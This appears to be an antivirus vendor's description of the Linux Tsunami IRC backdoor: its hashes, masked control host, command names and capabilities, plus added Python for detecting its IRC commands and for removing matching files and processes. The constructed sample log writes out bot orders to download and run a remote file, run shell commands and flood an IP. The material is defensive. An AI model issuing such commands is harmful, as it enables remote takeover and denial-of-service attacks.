Backdoor.Linux.Tsunami.gen

Technical Details

This backdoor gives an attacker remote control of an infected machine. It is an ELF executable for Linux, 29 318 bytes in size.

MD5: 1610768b1524e24d840ae25964d02c8e

SHA1: 8766ba34a15e56850feab896b37a987077b0d2a4

Payload

The backdoor connects to the following host (the address is partially masked on this page):

80.***.54.131

Over this connection it receives commands from the attacker. The following command names are recognized:

TSUNAMI
UNKNOWN
NICK
SERVER
GETSPOOFS
SPOOFS
DISABLE
ENABLE
KILL
VERSION
KILLALL
HELP
IRC
SH
PAN
MOVE
UDP
GET

Depending on the command, the backdoor can perform the following actions:

  • downloads a file from the Internet, saves it under the specified name and runs it (GET);
  • executes shell commands on the infected machine (SH);
  • communicates with the attacker over IRC and HTTP and manages its own session and instance (SERVER, NICK, IRC, VERSION, HELP, MOVE, KILL);
  • launches DDoS attacks against a specified IP address (TSUNAMI, GETSPOOFS, SPOOFS, DISABLE, ENABLE, PAN, UDP, KILLALL).

Thus, the backdoor gives the attacker full control of the infected computer, which becomes part of a botnet.
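The command set above is what a network defender can key on: the bot takes its orders as IRC messages, so a scan of IRC traffic (or of a proxy/IDS log of it) for these command names in PRIVMSG text flags both the herder and the channel. The following Python detector is an added example written for this page, not code from Kaspersky or from the malware. It assumes the standard IRC PRIVMSG wire format (":nick!user@host PRIVMSG <target> :<text>") and, as a heuristic the page does not state, that the command may be either the first token of the message or the second token when the first is an addressing token such as "!bot"; the sample traffic is constructed, with documentation-range addresses.

```python
import re
from dataclasses import dataclass, field

# Command names the page lists for Backdoor.Linux.Tsunami.gen, grouped by the
# action the page attributes to them.
TSUNAMI_COMMANDS = {
    "download_and_run": {"GET"},
    "shell": {"SH"},
    "irc_management": {"SERVER", "NICK", "IRC", "VERSION", "HELP", "MOVE", "KILL"},
    "ddos": {"TSUNAMI", "GETSPOOFS", "SPOOFS", "DISABLE", "ENABLE", "PAN", "UDP", "KILLALL"},
    "unknown": {"UNKNOWN"},
}
COMMAND_CATEGORY = {cmd: cat for cat, cmds in TSUNAMI_COMMANDS.items() for cmd in cmds}

# Raw IRC line as the client receives it: ":nick!user@host PRIVMSG <target> :<text>"
PRIVMSG_RE = re.compile(
    r"^(?::(?P<prefix>\S+)\s+)?PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$"
)


@dataclass
class CommandHit:
    sender: str
    target: str
    command: str
    category: str
    args: list = field(default_factory=list)


def extract_command(text):
    """Return (command, args) if the message text carries a known bot command.

    Assumption (not stated on the page): the command is the first token, or the
    second token when the first is an addressing token such as "!bot".  Leading
    "!" / "." prefix characters are ignored when matching the name.
    """
    tokens = text.strip().split()
    for i, tok in enumerate(tokens[:2]):
        name = tok.lstrip("!.").upper()
        if name in COMMAND_CATEGORY:
            return name, tokens[i + 1:]
    return None, []


def scan_irc_log(lines):
    """Scan raw IRC lines and return one CommandHit per Tsunami command seen."""
    hits = []
    for line in lines:
        m = PRIVMSG_RE.match(line.rstrip("\r\n"))
        if not m:
            continue  # PING, JOIN, numerics etc. carry no bot commands
        command, args = extract_command(m.group("text"))
        if command is None:
            continue
        prefix = m.group("prefix") or ""
        sender = prefix.split("!", 1)[0]  # "nick!user@host" -> "nick"
        hits.append(CommandHit(sender, m.group("target"), command,
                               COMMAND_CATEGORY[command], args))
    return hits


def summarize(hits):
    """Count hits per category; any 'ddos', 'shell' or 'download_and_run' hit is the alert."""
    counts = {cat: 0 for cat in TSUNAMI_COMMANDS}
    for h in hits:
        counts[h.category] += 1
    return counts


# Constructed sample traffic (not captured from the real sample); addresses are
# private/documentation ranges.
SAMPLE_IRC_LOG = [
    ":herder!x@10.0.0.5 PRIVMSG #bots :NICK node-4471",
    ":herder!x@10.0.0.5 PRIVMSG #bots :!bot GET http://192.0.2.10/upd /tmp/.x",
    ":herder!x@10.0.0.5 PRIVMSG #bots :SH uname -a",
    ":herder!x@10.0.0.5 PRIVMSG #bots :TSUNAMI 198.51.100.7 600",
    ":alice!y@10.0.0.9 PRIVMSG #chat :hello, is the server up?",
    "PING :irc.example.net",
]

if __name__ == "__main__":
    found = scan_irc_log(SAMPLE_IRC_LOG)
    for hit in found:
        print(f"{hit.sender:>8} -> {hit.target}: {hit.command:<9} [{hit.category}] {' '.join(hit.args)}")
    print(summarize(found))
```

A match on bare command names is a weak signature on its own: ordinary chat containing "kill", "help" or "version" as the first word will trip it. Treat a hit as an alert when it comes from the same connection as the control host listed above, or when the sender issues several categories (NICK followed by SH or TSUNAMI) within one session, and confirm on the endpoint with the file hashes.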

Removal Instructions

If your computer does not have an antivirus and is infected by this malicious program, follow the instructions below to delete it:

  1. Terminate the running backdoor process first: deleting the file alone does not stop a process that is already running, because Linux keeps the unlinked executable open until the process exits.
  2. Delete the original malicious file (its location on the infected computer depends on how the program originally penetrated the victim machine; the size, MD5 and SHA1 listed above identify it).
  3. Perform a full scan of the computer using Kaspersky Anti-Virus with up-to-date antivirus databases (download a trial version).
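The manual removal steps above can be carried out with the indicators on this page. The following Python script is an added example for this page, not a Kaspersky tool: it locates files whose size, MD5 and SHA1 all match the description, finds any process still running that binary by hashing /proc/<pid>/exe (which works even after the file has been unlinked), and only kills or deletes when asked to. The list of pseudo-filesystems to skip and the --kill/--delete flags are this example's own choices.

```python
import hashlib
import os
import signal
import sys

# Indicators taken from the description above.
TSUNAMI_IOC = {
    "size": 29318,
    "md5": "1610768b1524e24d840ae25964d02c8e",
    "sha1": "8766ba34a15e56850feab896b37a987077b0d2a4",
}

# Pseudo-filesystems not worth walking (assumed mount points, adjust as needed).
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def hash_file(path):
    """Return (md5_hex, sha1_hex) of a file, read in 64 KiB chunks."""
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            md5.update(chunk)
            sha1.update(chunk)
    return md5.hexdigest(), sha1.hexdigest()


def ioc_from_file(path):
    """Build a {size, md5, sha1} record for a file, e.g. to record a new variant."""
    md5, sha1 = hash_file(path)
    return {"size": os.stat(path).st_size, "md5": md5, "sha1": sha1}


def matches_ioc(path, ioc=TSUNAMI_IOC):
    """True only if the file has the indicator's exact size and both hashes."""
    try:
        if os.stat(path).st_size != ioc["size"]:  # cheap filter before hashing
            return False
        md5, sha1 = hash_file(path)
    except OSError:  # missing file, permission denied, kernel thread
        return False
    return md5 == ioc["md5"] and sha1 == ioc["sha1"]


def find_samples(root, ioc=TSUNAMI_IOC):
    """Walk `root` and return paths of regular files matching the indicator."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.isfile(path) and not os.path.islink(path) and matches_ioc(path, ioc):
                found.append(path)
    return found


def running_samples(ioc=TSUNAMI_IOC):
    """Return [(pid, exe_link_target)] for processes whose binary matches the indicator.

    /proc/<pid>/exe is hashed directly, so a bot whose file was already deleted
    is still found; its link target then reads "<path> (deleted)".
    """
    hits = []
    if not os.path.isdir("/proc"):
        return hits
    for pid in (p for p in os.listdir("/proc") if p.isdigit()):
        exe_link = f"/proc/{pid}/exe"
        if matches_ioc(exe_link, ioc):
            try:
                target = os.readlink(exe_link)
            except OSError:
                target = "?"
            hits.append((int(pid), target))
    return hits


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 and not sys.argv[1].startswith("--") else "/"
    # Step 1: stop the process before touching the file.
    for pid, exe in running_samples():
        print(f"matching process: pid {pid} ({exe})")
        if "--kill" in sys.argv:
            os.kill(pid, signal.SIGKILL)
    # Step 2: remove the file(s).
    for path in find_samples(root):
        print("matching file:", path)
        if "--delete" in sys.argv:
            os.remove(path)
```

Run it as root for the process check, since /proc/<pid>/exe of other users' processes is not readable otherwise; a dry run with no flags just reports. The exact-hash match means a repacked or recompiled variant is missed, which is why step 3, the full antivirus scan, still follows.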